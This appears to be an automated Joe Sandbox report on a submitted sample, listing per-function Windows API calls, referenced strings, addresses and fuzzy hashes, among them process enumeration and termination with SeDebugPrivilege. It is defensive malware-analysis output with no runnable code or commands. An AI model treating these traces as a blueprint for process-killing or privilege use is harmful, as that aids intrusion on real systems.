                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2014098862-0
                                                                                                                            • Opcode ID: d96223ceb9198af0d05da01ac24e9466e98fda4796e4eb5ef07ef7912bf43f56
                                                                                                                            • Instruction ID: d353d35b7e9ffcd7484a89451b6c5573609af7c07e1e4f74669991a308da7c1b
                                                                                                                            • Opcode Fuzzy Hash: d96223ceb9198af0d05da01ac24e9466e98fda4796e4eb5ef07ef7912bf43f56
                                                                                                                            • Instruction Fuzzy Hash: 7F11E1B1910218BEF6106F61EC8AF6A3B2DEB4C7A0F100425F254AB0A1C9F35C10EAA4
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F3853C,00000B00,?,?), ref: 00F3892A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F38931
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F3853C,00000B00,?,?), ref: 00F38946
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00F3853C,00000B00,?,?), ref: 00F3894E
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F38951
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F3853C,00000B00,?,?), ref: 00F38961
                                                                                                                            • GetCurrentProcess.KERNEL32(00F3853C,00000000,?,00F3853C,00000B00,?,?), ref: 00F38969
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00F3853C,00000B00,?,?), ref: 00F3896C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00F38992,00000000,00000000,00000000), ref: 00F38986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1957940570-0
                                                                                                                            • Opcode ID: 3b345b0fcfccd4fd0bd969d826789b8a1607176f99d2fc2ce4b41c8d7123db68
                                                                                                                            • Instruction ID: 60a6985bf173d4dc3d028f2d1afc4a404159990406c798771035d02a90b01314
                                                                                                                            • Opcode Fuzzy Hash: 3b345b0fcfccd4fd0bd969d826789b8a1607176f99d2fc2ce4b41c8d7123db68
                                                                                                                            • Instruction Fuzzy Hash: 7F01BF75240348FFE710ABA5EC4DF673B6CEB89751F404421FA15DB191CAB59804EB21
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                            • API String ID: 0-572801152
                                                                                                                            • Opcode ID: 5602865f51a8116179084442b421ec6bdc663bc646f1369c6d01d03809d38025
                                                                                                                            • Instruction ID: 5af0150877aa5124159d75b22453d9604a598d0a7e68054c702d06cc3f6a9150
                                                                                                                            • Opcode Fuzzy Hash: 5602865f51a8116179084442b421ec6bdc663bc646f1369c6d01d03809d38025
                                                                                                                            • Instruction Fuzzy Hash: A6C1A371E0420ADBDF14DF58D885BAEB7F5FB48315F148429EE05AB280E7B09D49DB60
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                            • API String ID: 2862541840-625585964
                                                                                                                            • Opcode ID: 273af6bdd01429a0636391edafb878072e04681c08b77b206cc7d161a63ee6b7
                                                                                                                            • Instruction ID: 1cf902a099d04a0e6a7ba1fdf3f02da6d0beb7fa5533fbf7626e22d1efbb7870
                                                                                                                            • Opcode Fuzzy Hash: 273af6bdd01429a0636391edafb878072e04681c08b77b206cc7d161a63ee6b7
                                                                                                                            • Instruction Fuzzy Hash: 8091B571D04215EBDF28DF91CC48F9E77B8EF45721F108159FA15AB280D7B09909DBA0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?,?,00F37455), ref: 00F37127
                                                                                                                              • Part of subcall function 00F3710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37142
                                                                                                                              • Part of subcall function 00F3710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37150
                                                                                                                              • Part of subcall function 00F3710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?), ref: 00F37160
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F59806
                                                                                                                            • _memset.LIBCMT ref: 00F59813
                                                                                                                            • _memset.LIBCMT ref: 00F59956
                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F59982
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00F5998D
                                                                                                                            Strings
                                                                                                                            • NULL Pointer assignment, xrefs: 00F599DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                            • API String ID: 1300414916-2785691316
                                                                                                                            • Opcode ID: 9f1b54033462f733c6aac4db60dfaffa516fa8fb42d2afbfee8fdf3f5bfed90f
                                                                                                                            • Instruction ID: c66ccd020e32d024090d4ddcc719d3c7da691200dff0db27f7f1d79fd4a26f02
                                                                                                                            • Opcode Fuzzy Hash: 9f1b54033462f733c6aac4db60dfaffa516fa8fb42d2afbfee8fdf3f5bfed90f
                                                                                                                            • Instruction Fuzzy Hash: FB914871D0421DEBDB14DFA5DC44EDEBBB9AF08310F10415AF919A7281DB719A48DFA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F66E24
                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F66E38
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F66E52
                                                                                                                            • _wcscat.LIBCMT ref: 00F66EAD
                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F66EC4
                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F66EF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                                                            • String ID: SysListView32
                                                                                                                            • API String ID: 307300125-78025650
                                                                                                                            • Opcode ID: 8c20add1701bdc0c645499882604fb06fee348d088463dd6712c74edc98342ff
                                                                                                                            • Instruction ID: b41cc074ea7652a0c95ece235db3e969972d43ad793b84324d9446d64bf25327
                                                                                                                            • Opcode Fuzzy Hash: 8c20add1701bdc0c645499882604fb06fee348d088463dd6712c74edc98342ff
                                                                                                                            • Instruction Fuzzy Hash: 5341B271A00348ABEF21DF64CC85BEEB7E8EF08360F10042AF554E7291D6729D84EB60
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F43C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F43C7A
                                                                                                                              • Part of subcall function 00F43C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F43C88
                                                                                                                              • Part of subcall function 00F43C55: CloseHandle.KERNEL32(00000000), ref: 00F43D52
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F5E9A4
                                                                                                                            • GetLastError.KERNEL32 ref: 00F5E9B7
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F5E9E6
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F5EA63
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00F5EA6E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F5EAA3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                            • Opcode ID: 65705abf9a95a1db5cd33ef0273616beacdbfdbc90cb535105db7dbb4f0f32d7
                                                                                                                            • Instruction ID: c7008a859f85d60c26106cb3f8cb2b54ea23e816ecbf28591d9a71bf01886d31
                                                                                                                            • Opcode Fuzzy Hash: 65705abf9a95a1db5cd33ef0273616beacdbfdbc90cb535105db7dbb4f0f32d7
                                                                                                                            • Instruction Fuzzy Hash: 0A41B1716002059FDB18EF24DC95F6DB7E5AF40324F188418FA429B3D3CBB9A908EB95
                                                                                                                            APIs
                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00F43033
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoad
                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                            • Opcode ID: 50e5a218f24ccc3b8bd41b22c15e95711e6fbd21711153a4db9d9e0a1412c0b0
                                                                                                                            • Instruction ID: 190ad590d800d94b14836329d2774a9da9397dfb6e262c7660b1f4e16e472dba
                                                                                                                            • Opcode Fuzzy Hash: 50e5a218f24ccc3b8bd41b22c15e95711e6fbd21711153a4db9d9e0a1412c0b0
                                                                                                                            • Instruction Fuzzy Hash: 09112B32788346BEFB549A18DC42D6B7F9C9F16374B20012AFD00A61C1DBB59F4475A1
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F44312
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00F44319
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F4432F
                                                                                                                            • LoadStringW.USER32(00000000), ref: 00F44336
                                                                                                                            • _wprintf.LIBCMT ref: 00F4435C
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F4437A
                                                                                                                            Strings
                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00F44357
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                            • API String ID: 3648134473-3128320259
                                                                                                                            • Opcode ID: e5309db0dfb6b640060318ed11c8bb502b93fd157ff0e8f8ac498de84ffad3c0
                                                                                                                            • Instruction ID: fae53ebb79aa8a5a7e63a628f7d6ac1c9df58a63dacbeecdea8030879235ba7a
                                                                                                                            • Opcode Fuzzy Hash: e5309db0dfb6b640060318ed11c8bb502b93fd157ff0e8f8ac498de84ffad3c0
                                                                                                                            • Instruction Fuzzy Hash: 240167F290420CBFE7119B90ED89FF6776CE709700F4005A1FB55E2051EAB55E896B71
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F6D47C
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F6D49C
                                                                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F6D6D7
                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F6D6F5
                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F6D716
                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00F6D735
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F6D75A
                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F6D77D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1211466189-0
                                                                                                                            • Opcode ID: 3a992ed2e1d9ddc701983a67e4947cdbe1eeaaa849ce83f5e858f39936e1621a
                                                                                                                            • Instruction ID: 906b24fd5eda7a3fbba24968d4d84afc7d8c68e3e172b445aed0ae13d0224d30
                                                                                                                            • Opcode Fuzzy Hash: 3a992ed2e1d9ddc701983a67e4947cdbe1eeaaa849ce83f5e858f39936e1621a
                                                                                                                            • Instruction Fuzzy Hash: 78B1BA71A00229EFDF14CF68C9847AD3BB1BF04710F088069EC589B295D775AD50EBA0
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00EE2ACF
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00EE2B17
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00F1C21A
                                                                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F1C1C7,00000004,00000000,00000000,00000000), ref: 00F1C286
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1268545403-0
                                                                                                                            • Opcode ID: bb2976630464cb81e8182af7f21e2c4ccce0619b4a9eb89536a0d3ec674b88a5
                                                                                                                            • Instruction ID: 045002fda076c26b932b5feb91d640c0be8fea25f4393ce23424ce1877e02659
                                                                                                                            • Opcode Fuzzy Hash: bb2976630464cb81e8182af7f21e2c4ccce0619b4a9eb89536a0d3ec674b88a5
                                                                                                                            • Instruction Fuzzy Hash: 87416C316087CC9BC7358F6ADC88BBB3B99BB45314F18A83DE24BA2560C67598C5E750
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F470DD
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F47114
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00F47130
                                                                                                                            • _memmove.LIBCMT ref: 00F4717E
                                                                                                                            • _memmove.LIBCMT ref: 00F4719B
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00F471AA
                                                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F471BF
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F471DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 256516436-0
                                                                                                                            • Opcode ID: 3b75bd8f21b05aae3b63eece49b09786015490ec5bb32ebc567b3d68197ad55f
                                                                                                                            • Instruction ID: 25b4ad714ed8522265a71e808618f65a34c289445855a09b9263f3e47ad24ea1
                                                                                                                            • Opcode Fuzzy Hash: 3b75bd8f21b05aae3b63eece49b09786015490ec5bb32ebc567b3d68197ad55f
                                                                                                                            • Instruction Fuzzy Hash: C6317031900209EBDB00EFA4DD85AAEBB78FF45710F1441A5FD04AB296DB74DE14EB60
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F661EB
                                                                                                                            • GetDC.USER32(00000000), ref: 00F661F3
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F661FE
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F6620A
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F66246
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F66257
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F6902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F66291
                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F662B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3864802216-0
                                                                                                                            • Opcode ID: 129121a77d6e6a764808b79385ee27ec876d307bccef093ed1b62c8e7c102c3f
                                                                                                                            • Instruction ID: ae45f819d7afe2d8d25a32682e8d0906471aa9f07560afbddebbf210b6214905
                                                                                                                            • Opcode Fuzzy Hash: 129121a77d6e6a764808b79385ee27ec876d307bccef093ed1b62c8e7c102c3f
                                                                                                                            • Instruction Fuzzy Hash: C6317F72101214BFEF118F50DC8AFEA3BA9EF4A765F044065FE18DA1A2C6B59C41DB70
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2931989736-0
                                                                                                                            • Opcode ID: 74c9d4ec06afb4537e47f710aa6fdfaf16d9541cf8f220b2e38ad98d5cbfebfe
                                                                                                                            • Instruction ID: e050f3aad48546120d3f4fa85aba4f374a734ddd26991e973035d7d392efc583
                                                                                                                            • Opcode Fuzzy Hash: 74c9d4ec06afb4537e47f710aa6fdfaf16d9541cf8f220b2e38ad98d5cbfebfe
                                                                                                                            • Instruction Fuzzy Hash: DD21FC62A0120677E615AB119D62FFFB35CAE513B8F044015FF0856683EF18DF11B1B2
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
